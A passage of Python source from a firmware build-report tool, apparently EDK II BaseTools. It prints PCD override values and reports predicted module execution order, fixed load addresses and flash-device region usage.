Pcd.DatumType)) InfDefaultValue = None PcdValue = DecDefaultValue if DscDefaultValue: PcdValue = DscDefaultValue if ModulePcdSet is not None: if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet: continue InfDefault, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type] if InfDefault == "": InfDefault = None BuildOptionMatch = False if GlobalData.BuildOptionPcd: for pcd in GlobalData.BuildOptionPcd: if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]): if pcd[2]: continue PcdValue = pcd[3] Pcd.DefaultValue = PcdValue BuildOptionMatch = True break if First: if ModulePcdSet is None: FileWrite(File, "") FileWrite(File, Key) First = False if Pcd.DatumType in ('UINT8', 'UINT16', 'UINT32', 'UINT64'): PcdValueNumber = int(PcdValue.strip(), 0) if DecDefaultValue is None: DecMatch = True else: DecDefaultValueNumber = int(DecDefaultValue.strip(), 0) DecMatch = (DecDefaultValueNumber == PcdValueNumber) if InfDefaultValue is None: InfMatch = True else: InfDefaultValueNumber = int(InfDefaultValue.strip(), 0) InfMatch = 
(InfDefaultValueNumber == PcdValueNumber) if DscDefaultValue is None: DscMatch = True else: DscDefaultValueNumber = int(DscDefaultValue.strip(), 0) DscMatch = (DscDefaultValueNumber == PcdValueNumber) else: if DecDefaultValue is None: DecMatch = True else: DecMatch = (DecDefaultValue.strip() == PcdValue.strip()) if InfDefaultValue is None: InfMatch = True else: InfMatch = (InfDefaultValue.strip() == PcdValue.strip()) if DscDefaultValue is None: DscMatch = True else: DscMatch = (DscDefaultValue.strip() == PcdValue.strip()) IsStructure = False if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd.keys()) and ((Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.gStructurePcd[self.Arch]): IsStructure = True if TypeName in ('DYNVPD', 'DEXVPD'): SkuInfoList = Pcd.SkuInfoList Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)] Pcd.DatumType = Pcd.StructName if TypeName in ('DYNVPD', 'DEXVPD'): Pcd.SkuInfoList = SkuInfoList if Pcd.PcdFieldValueFromComm: BuildOptionMatch = True DecMatch = False elif Pcd.SkuOverrideValues: DscOverride = False if not Pcd.SkuInfoList: OverrideValues = Pcd.SkuOverrideValues if OverrideValues: Keys = OverrideValues.keys() Data = OverrideValues[Keys[0]] Struct = Data.values()[0] DscOverride = self.ParseStruct(Struct) else: SkuList = sorted(Pcd.SkuInfoList.keys()) for Sku in SkuList: SkuInfo = Pcd.SkuInfoList[Sku] if TypeName in ('DYNHII', 'DEXHII'): if SkuInfo.DefaultStoreDict: DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys()) for DefaultStore in DefaultStoreList: OverrideValues = Pcd.SkuOverrideValues[Sku] DscOverride = self.ParseStruct(OverrideValues[DefaultStore]) if DscOverride: break else: OverrideValues = Pcd.SkuOverrideValues[Sku] if OverrideValues: Keys = OverrideValues.keys() OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]]) DscOverride = self.ParseStruct(OverrideFieldStruct) if DscOverride: break if DscOverride: DscMatch = True DecMatch = False # # Report PCD item according to their override relationship # if DecMatch and InfMatch: self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ') elif BuildOptionMatch: self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B') else: if DscMatch: if (Pcd.TokenCName, Key) in self.FdfPcdSet: self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F') else: self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P') else: self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M') if ModulePcdSet is None: if IsStructure: continue if not TypeName in ('PATCH', 'FLAG', 'FIXED'): continue if not BuildOptionMatch: ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {}) for ModulePath in ModuleOverride: ModuleDefault = ModuleOverride[ModulePath] if Pcd.DatumType in ('UINT8', 'UINT16', 'UINT32', 'UINT64'): ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0) Match = (ModulePcdDefaultValueNumber == PcdValueNumber) else: Match = (ModuleDefault.strip() == PcdValue.strip()) if Match: continue IsByteArray, ArrayList = 
ByteArrayForamt(ModuleDefault.strip()) if IsByteArray: FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 19, ModulePath, '{')) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 19, ModulePath, ModuleDefault.strip())) if ModulePcdSet is None: FileWrite(File, gSectionEnd) else: if not ReportSubType and ModulePcdSet: FileWrite(File, gSubSectionEnd) def ParseStruct(self, struct): HasDscOverride = False if struct: for _, Values in struct.items(): if Values[1] and Values[1].endswith('.dsc'): HasDscOverride = True break return HasDscOverride def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue): if not DscMatch and DscDefaultValue is not None: Value = DscDefaultValue.strip() IsByteArray, ArrayList = ByteArrayForamt(Value) if IsByteArray: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{")) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value)) if not InfMatch and InfDefaultValue is not None: Value = InfDefaultValue.strip() IsByteArray, ArrayList = ByteArrayForamt(Value) if IsByteArray: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{")) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value)) if not DecMatch and DecDefaultValue is not None: Value = DecDefaultValue.strip() IsByteArray, ArrayList = ByteArrayForamt(Value) if IsByteArray: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{")) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value)) if IsStructure: self.PrintStructureInfo(File, Pcd.DefaultValues) if DecMatch and IsStructure: self.PrintStructureInfo(File, Pcd.DefaultValues) def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '): if not Pcd.SkuInfoList: Value = Pcd.DefaultValue IsByteArray, ArrayList = ByteArrayForamt(Value) if IsByteArray: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{')) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value)) if IsStructure: OverrideValues = Pcd.SkuOverrideValues if OverrideValues: Keys = OverrideValues.keys() Data = OverrideValues[Keys[0]] Struct = Data.values()[0] OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct) self.PrintStructureInfo(File, OverrideFieldStruct) self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue) else: FirstPrint = True SkuList = sorted(Pcd.SkuInfoList.keys()) for Sku in SkuList: SkuInfo = Pcd.SkuInfoList[Sku] SkuIdName = SkuInfo.SkuIdName if TypeName in ('DYNHII', 'DEXHII'): if SkuInfo.DefaultStoreDict: DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys()) for DefaultStore in DefaultStoreList: Value = SkuInfo.DefaultStoreDict[DefaultStore] IsByteArray, ArrayList = ByteArrayForamt(Value) if FirstPrint: FirstPrint = False if IsByteArray: if self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{')) elif 
self.DefaultStoreSingle and not self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{')) elif not self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{')) else: FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{')) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: if self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value)) elif self.DefaultStoreSingle and not self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value)) elif not self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value)) else: FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value)) else: if IsByteArray: if self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{')) elif self.DefaultStoreSingle and not self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{')) elif not self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{')) else: FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{')) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: if self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value)) elif self.DefaultStoreSingle and not self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value)) elif not self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value)) else: FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value)) FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset)) if IsStructure: OverrideValues = Pcd.SkuOverrideValues[Sku] OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore]) self.PrintStructureInfo(File, OverrideFieldStruct) self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue) else: Value = SkuInfo.DefaultValue IsByteArray, ArrayList = ByteArrayForamt(Value) if FirstPrint: FirstPrint = False if IsByteArray: if self.SkuSingle: FileWrite(File, ' %-*s : 
%6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{")) else: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{")) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: if self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value)) else: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value)) else: if IsByteArray: if self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', "{")) else: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{")) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: if self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', Value)) else: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value)) if TypeName in ('DYNVPD', 'DEXVPD'): FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset)) if IsStructure: OverrideValues = Pcd.SkuOverrideValues[Sku] if OverrideValues: Keys = OverrideValues.keys() OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]]) self.PrintStructureInfo(File, OverrideFieldStruct) self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue) def OverrideFieldValue(self, Pcd, OverrideStruct): OverrideFieldStruct = collections.OrderedDict() if OverrideStruct: for Key, Values in OverrideStruct.items(): if Values[1] and Values[1].endswith('.dsc'): OverrideFieldStruct[Key] = Values if Pcd.PcdFieldValueFromComm: for Key, Values in Pcd.PcdFieldValueFromComm.items(): OverrideFieldStruct[Key] = Values return OverrideFieldStruct def PrintStructureInfo(self, File, Struct): for Key, Value in Struct.items(): if Value[1] and 'build command options' in Value[1]: FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0])) else: FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0])) def StrtoHex(self, value): try: value = hex(int(value)) return value except: if value.startswith("L\"") and value.endswith("\""): valuelist = [] for ch in value[2:-1]: valuelist.append(hex(ord(ch))) valuelist.append('0x00') return valuelist elif value.startswith("\"") and value.endswith("\""): return hex(ord(value[1:-1])) elif value.startswith("{") and value.endswith("}"): valuelist = [] if ',' not in value: return value[1:-1] for ch in value[1:-1].split(','): ch = ch.strip() if ch.startswith('0x') or ch.startswith('0X'): valuelist.append(ch) continue try: valuelist.append(hex(int(ch.strip()))) except: pass return valuelist else: return value ## # Reports platform and module Prediction information # # This class reports the platform execution order prediction section and # module load fixed address prediction subsection in the build report file. # class PredictionReport(object): ## # Constructor function for class PredictionReport # # This constructor function generates PredictionReport object for the platform. 
# # @param self: The object pointer # @param Wa Workspace context information # def __init__(self, Wa): self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map") self._MapFileParsed = False self._EotToolInvoked = False self._FvDir = Wa.FvDir self._EotDir = Wa.BuildDir self._FfsEntryPoint = {} self._GuidMap = {} self._SourceList = [] self.FixedMapDict = {} self.ItemList = [] self.MaxLen = 0 # # Collect all platform reference source files and GUID C Name # for Pa in Wa.AutoGenObjectList: for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList: # # BASE typed modules are EFI agnostic, so we need not scan # their source code to find PPI/Protocol produce or consume # information. # if Module.ModuleType == "BASE": continue # # Add module referenced source files # self._SourceList.append(str(Module)) IncludeList = {} for Source in Module.SourceFileList: if os.path.splitext(str(Source))[1].lower() == ".c": self._SourceList.append(" " + str(Source)) FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList) for IncludeFile in IncludeList.values(): self._SourceList.append(" " + IncludeFile) for Guid in Module.PpiList: self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid]) for Guid in Module.ProtocolList: self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid]) for Guid in Module.GuidList: self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid]) if Module.Guid and not Module.IsLibrary: EntryPoint = " ".join(Module.Module.ModuleEntryPointList) if int(str(Module.AutoGenVersion), 0) >= 0x00010005: RealEntryPoint = "_ModuleEntryPoint" else: RealEntryPoint = EntryPoint if EntryPoint == "_ModuleEntryPoint": CCFlags = Module.BuildOption.get("CC", {}).get("FLAGS", "") Match = gGlueLibEntryPoint.search(CCFlags) if Match: EntryPoint = Match.group(1) self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint) # # Collect platform firmware volume list as the input of EOT. # self._FvList = [] if Wa.FdfProfile: for Fd in Wa.FdfProfile.FdDict: for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList: if FdRegion.RegionType != "FV": continue for FvName in FdRegion.RegionDataList: if FvName in self._FvList: continue self._FvList.append(FvName) for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList: for Section in Ffs.SectionList: try: for FvSection in Section.SectionList: if FvSection.FvName in self._FvList: continue self._FvList.append(FvSection.FvName) except AttributeError: pass ## # Parse platform fixed address map files # # This function parses the platform final fixed address map file to get # the database of predicted fixed address for module image base, entry point # etc. # # @param self: The object pointer # def _ParseMapFile(self): if self._MapFileParsed: return self._MapFileParsed = True if os.path.isfile(self._MapFileName): try: FileContents = open(self._MapFileName).read() for Match in gMapFileItemPattern.finditer(FileContents): AddressType = Match.group(1) BaseAddress = Match.group(2) EntryPoint = Match.group(3) Guid = Match.group(4).upper() List = self.FixedMapDict.setdefault(Guid, []) List.append((AddressType, BaseAddress, "*I")) List.append((AddressType, EntryPoint, "*E")) except: EdkLogger.warn(None, "Cannot open file to read", self._MapFileName) ## # Invokes EOT tool to get the predicted the execution order. 
# # This function invokes EOT tool to calculate the predicted dispatch order # # @param self: The object pointer # def _InvokeEotTool(self): if self._EotToolInvoked: return self._EotToolInvoked = True FvFileList = [] for FvName in self._FvList: FvFile = os.path.join(self._FvDir, FvName + ".Fv") if os.path.isfile(FvFile): FvFileList.append(FvFile) if len(FvFileList) == 0: return # # Write source file list and GUID file list to an intermediate file # as the input for EOT tool and dispatch List as the output file # from EOT tool. # SourceList = os.path.join(self._EotDir, "SourceFile.txt") GuidList = os.path.join(self._EotDir, "GuidList.txt") DispatchList = os.path.join(self._EotDir, "Dispatch.txt") TempFile = open(SourceList, "w+") for Item in self._SourceList: FileWrite(TempFile, Item) TempFile.close() TempFile = open(GuidList, "w+") for Key in self._GuidMap: FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key])) TempFile.close() try: from Eot.Eot import Eot # # Invoke EOT tool and echo its runtime performance # EotStartTime = time.time() Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList, FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True) EotEndTime = time.time() EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime)))) EdkLogger.quiet("EOT run time: %s\n" % EotDuration) # # Parse the output of EOT tool # for Line in open(DispatchList): if len(Line.split()) < 4: continue (Guid, Phase, FfsName, FilePath) = Line.split() Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0] if len(Symbol) > self.MaxLen: self.MaxLen = len(Symbol) self.ItemList.append((Phase, Symbol, FilePath)) except: EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc())) EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.") ## # Generate platform execution order report # # This function generates the predicted module execution order. # # @param self The object pointer # @param File The file object for report # def _GenerateExecutionOrderReport(self, File): self._InvokeEotTool() if len(self.ItemList) == 0: return FileWrite(File, gSectionStart) FileWrite(File, "Execution Order Prediction") FileWrite(File, "*P PEI phase") FileWrite(File, "*D DXE phase") FileWrite(File, "*E Module INF entry point name") FileWrite(File, "*N Module notification function name") FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path")) FileWrite(File, gSectionSep) for Item in self.ItemList: FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2])) FileWrite(File, gSectionStart) ## # Generate Fixed Address report. # # This function generate the predicted fixed address report for a module # specified by Guid. # # @param self The object pointer # @param File The file object for report # @param Guid The module Guid value. 
# @param NotifyList The list of all notify function in a module # def _GenerateFixedAddressReport(self, File, Guid, NotifyList): self._ParseMapFile() FixedAddressList = self.FixedMapDict.get(Guid) if not FixedAddressList: return FileWrite(File, gSubSectionStart) FileWrite(File, "Fixed Address Prediction") FileWrite(File, "*I Image Loading Address") FileWrite(File, "*E Entry Point Address") FileWrite(File, "*N Notification Function Address") FileWrite(File, "*F Flash Address") FileWrite(File, "*M Memory Address") FileWrite(File, "*S SMM RAM Offset") FileWrite(File, "TOM Top of Memory") FileWrite(File, "Type Address Name") FileWrite(File, gSubSectionSep) for Item in FixedAddressList: Type = Item[0] Value = Item[1] Symbol = Item[2] if Symbol == "*I": Name = "(Image Base)" elif Symbol == "*E": Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1] elif Symbol in NotifyList: Name = Symbol Symbol = "*N" else: continue if "Flash" in Type: Symbol += "F" elif "Memory" in Type: Symbol += "M" else: Symbol += "S" if Value[0] == "-": Value = "TOM" + Value FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name)) ## # Generate report for the prediction part # # This function generate the predicted fixed address report for a module or # predicted module execution order for a platform. # If the input Guid is None, then, it generates the predicted module execution order; # otherwise it generated the module fixed loading address for the module specified by # Guid. # # @param self The object pointer # @param File The file object for report # @param Guid The module Guid value. # def GenerateReport(self, File, Guid): if Guid: self._GenerateFixedAddressReport(File, Guid.upper(), []) else: self._GenerateExecutionOrderReport(File) ## # Reports FD region information # # This class reports the FD subsection in the build report file. # It collects region information of platform flash device. # If the region is a firmware volume, it lists the set of modules # and its space information; otherwise, it only lists its region name, # base address and size in its sub-section header. # If there are nesting FVs, the nested FVs will list immediate after # this FD region subsection # class FdRegionReport(object): ## # Discover all the nested FV name list. # # This is an internal worker function to discover the all the nested FV information # in the parent firmware volume. It uses deep first search algorithm recursively to # find all the FV list name and append them to the list. # # @param self The object pointer # @param FvName The name of current firmware file system # @param Wa Workspace context information # def _DiscoverNestedFvList(self, FvName, Wa): FvDictKey=FvName.upper() if FvDictKey in Wa.FdfProfile.FvDict: for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList: for Section in Ffs.SectionList: try: for FvSection in Section.SectionList: if FvSection.FvName in self.FvList: continue self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName self.FvList.append(FvSection.FvName) self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0) self._DiscoverNestedFvList(FvSection.FvName, Wa) except AttributeError: pass ## # Constructor function for class FdRegionReport # # This constructor function generates FdRegionReport object for a specified FdRegion. # If the FdRegion is a firmware volume, it will recursively find all its nested Firmware # volume list. This function also collects GUID map in order to dump module identification # in the final report. 
# # @param self: The object pointer # @param FdRegion The current FdRegion object # @param Wa Workspace context information # def __init__(self, FdRegion, Wa): self.Type = FdRegion.RegionType self.BaseAddress = FdRegion.Offset self.Size = FdRegion.Size self.FvList = [] self.FvInfo = {} self._GuidsDb = {} self._FvDir = Wa.FvDir self._WorkspaceDir = Wa.WorkspaceDir # # If the input FdRegion is not a firmware volume, # we are done. # if self.Type != "FV": return # # Find all nested FVs in the FdRegion # for FvName in FdRegion.RegionDataList: if FvName in self.FvList: continue self.FvList.append(FvName) self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size) self._DiscoverNestedFvList(FvName, Wa) PlatformPcds = {} # # Collect PCDs declared in DEC files. # for Pa in Wa.AutoGenObjectList: for Package in Pa.PackageList: for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds: DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue # # Collect PCDs defined in DSC file # for Pa in Wa.AutoGenObjectList: for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds: DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue # # Add PEI and DXE a priori files GUIDs defined in PI specification. # self._GuidsDb["1B45CC0A-156A-428A-AF62-49864DA0E6E6"] = "PEI Apriori" self._GuidsDb["FC510EE7-FFDC-11D4-BD41-0080C73C8881"] = "DXE Apriori" # # Add ACPI table storage file # self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage" for Pa in Wa.AutoGenObjectList: for ModuleKey in Pa.Platform.Modules: M = Pa.Platform.Modules[ModuleKey].M InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File) self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath) # # Collect the GUID map in the FV firmware volume # for FvName in self.FvList: FvDictKey=FvName.upper() if FvDictKey in Wa.FdfProfile.FvDict: for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList: try: # # collect GUID map for binary EFI file in FDF file. # Guid = Ffs.NameGuid.upper() Match = gPcdGuidPattern.match(Ffs.NameGuid) if Match: PcdTokenspace = Match.group(1) PcdToken = Match.group(2) if (PcdToken, PcdTokenspace) in PlatformPcds: GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)] Guid = GuidStructureByteArrayToGuidString(GuidValue).upper() for Section in Ffs.SectionList: try: ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName) self._GuidsDb[Guid] = ModuleSectFile except AttributeError: pass except AttributeError: pass ## # Internal worker function to generate report for the FD region # # This internal worker function to generate report for the FD region. # It the type is firmware volume, it lists offset and module identification. 
# # @param self The object pointer # @param File The file object for report # @param Title The title for the FD subsection # @param BaseAddress The base address for the FD region # @param Size The size of the FD region # @param FvName The FV name if the FD region is a firmware volume # def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None): FileWrite(File, gSubSectionStart) FileWrite(File, Title) FileWrite(File, "Type: %s" % Type) FileWrite(File, "Base Address: 0x%X" % BaseAddress) if self.Type == "FV": FvTotalSize = 0 FvTakenSize = 0 FvFreeSize = 0 if FvName.upper().endswith('.FV'): FileExt = FvName + ".txt" else: FileExt = FvName + ".Fv.txt" if not os.path.isfile(FileExt): FvReportFileName = mws.join(self._WorkspaceDir, FileExt) if not os.path.isfile(FvReportFileName): FvReportFileName = os.path.join(self._FvDir, FileExt) try: # # Collect size info in the firmware volume. # FvReport = open(FvReportFileName).read() Match = gFvTotalSizePattern.search(FvReport) if Match: FvTotalSize = int(Match.group(1), 16) Match = gFvTakenSizePattern.search(FvReport) if Match: FvTakenSize = int(Match.group(1), 16) FvFreeSize = FvTotalSize - FvTakenSize # # Write size information to the report file. # FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0)) FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize)) FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0)) FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0)) FileWrite(File, "Offset Module") FileWrite(File, gSubSectionSep) # # Write module offset and module identification to the report file. # OffsetInfo = {} for Match in gOffsetGuidPattern.finditer(FvReport): Guid = Match.group(2).upper() OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid) OffsetList = OffsetInfo.keys() OffsetList.sort() for Offset in OffsetList: FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset])) except IOError: EdkLogger.warn(None, "Fail to read report file", FvReportFileName) else: FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0)) FileWrite(File, gSubSectionEnd) ## # Generate report for the FD region # # This function generates report for the FD region. # # @param self The object pointer # @param File The file object for report # def GenerateReport(self, File): if (len(self.FvList) > 0): for FvItem in self.FvList: Info = self.FvInfo[FvItem] self._GenerateReport(File, Info[0], "FV", Info[1], Info[2], FvItem) else: self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size) ## # Reports FD information # # This class reports the FD section in the build report file. # It collects flash device information for a platform. # class FdReport(object): ## # Constructor function for class FdReport # # This constructor function generates FdReport object for a specified # firmware device. 
